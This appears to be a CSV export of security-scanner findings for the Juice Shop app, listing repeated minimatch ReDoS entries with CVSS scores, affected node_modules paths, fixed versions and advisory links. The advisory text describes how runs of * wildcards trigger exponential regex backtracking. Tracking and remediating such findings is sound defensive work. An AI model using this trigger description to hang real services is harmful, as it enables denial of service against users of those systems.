Minimatch 3.0.8,False,False,,2026-05-12 17:37:05.222226+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27904,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.226213+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,1333,2026-05-12,,,"minimatch: minimatch: Denial of Service via specially crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/archiver-utils/node_modules/minimatch/package.json,,True,,False,False,,False,,67e2ee7200dc183bf99b8a81950e2f5325d5f69071180e5fd639fe5c81943fee,135,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.226267+00:00,,,,,0,[],"10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-26996 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26 NEWLINE https://linux.oracle.com/cve/CVE-2026-26996.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26996 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26996,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26996 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.226220+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-26996,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.230048+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,1333,2026-05-12,,,"minimatch: minimatch: Denial of Service via specially crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/archiver/node_modules/minimatch/package.json,,True,,False,False,,False,,67e2ee7200dc183bf99b8a81950e2f5325d5f69071180e5fd639fe5c81943fee,136,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.230102+00:00,,,,,0,[],"10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-26996 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26 NEWLINE https://linux.oracle.com/cve/CVE-2026-26996.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26996 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26996,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26996 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.230056+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-26996,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.233793+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,1333,2026-05-12,,,"minimatch: minimatch: Denial of Service via specially crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/file-js/node_modules/minimatch/package.json,,True,,False,False,,False,,67e2ee7200dc183bf99b8a81950e2f5325d5f69071180e5fd639fe5c81943fee,137,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.233847+00:00,,,,,0,[],"10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-26996 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26 NEWLINE https://linux.oracle.com/cve/CVE-2026-26996.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26996 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26996,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26996 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.233800+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-26996,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.237828+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,1333,2026-05-12,,,"minimatch: minimatch: Denial of Service via specially crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/fstream/node_modules/minimatch/package.json,,True,,False,False,,False,,67e2ee7200dc183bf99b8a81950e2f5325d5f69071180e5fd639fe5c81943fee,138,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.237887+00:00,,,,,0,[],"10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-26996 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26 NEWLINE https://linux.oracle.com/cve/CVE-2026-26996.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26996 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26996,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26996 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.237837+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-26996,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.241824+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,1333,2026-05-12,,,"minimatch: minimatch: Denial of Service via specially crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/ignore-walk/node_modules/minimatch/package.json,,True,,False,False,,False,,67e2ee7200dc183bf99b8a81950e2f5325d5f69071180e5fd639fe5c81943fee,139,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.241879+00:00,,,,,0,[],"10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-26996 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26 NEWLINE https://linux.oracle.com/cve/CVE-2026-26996.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26996 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26996,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26996 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.241832+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-26996,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.245482+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,1333,2026-05-12,,,"minimatch: minimatch: Denial of Service via specially crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/node-pre-gyp/node_modules/minimatch/package.json,,True,,False,False,,False,,67e2ee7200dc183bf99b8a81950e2f5325d5f69071180e5fd639fe5c81943fee,140,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.245652+00:00,,,,,0,[],"10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-26996 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26 NEWLINE https://linux.oracle.com/cve/CVE-2026-26996.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26996 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26996,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26996 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.245601+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-26996,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.249540+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,1333,2026-05-12,,,"minimatch: minimatch: Denial of Service via specially crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/rimraf/node_modules/minimatch/package.json,,True,,False,False,,False,,67e2ee7200dc183bf99b8a81950e2f5325d5f69071180e5fd639fe5c81943fee,141,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.249596+00:00,,,,,0,[],"10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-26996 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26 NEWLINE https://linux.oracle.com/cve/CVE-2026-26996.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26996 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26996,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26996 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.249548+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-26996,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.253438+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,1333,2026-05-12,,,"minimatch: minimatch: Denial of Service via specially crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/sqlite3/node_modules/minimatch/package.json,,True,,False,False,,False,,67e2ee7200dc183bf99b8a81950e2f5325d5f69071180e5fd639fe5c81943fee,142,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.253516+00:00,,,,,0,[],"10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-26996 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26 NEWLINE https://linux.oracle.com/cve/CVE-2026-26996.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26996 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26996,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26996 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.253450+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-26996,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.257864+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,1333,2026-05-12,,,"minimatch: minimatch: Denial of Service via specially crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/ts-node-dev/node_modules/minimatch/package.json,,True,,False,False,,False,,67e2ee7200dc183bf99b8a81950e2f5325d5f69071180e5fd639fe5c81943fee,143,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.257920+00:00,,,,,0,[],"10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-26996 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE 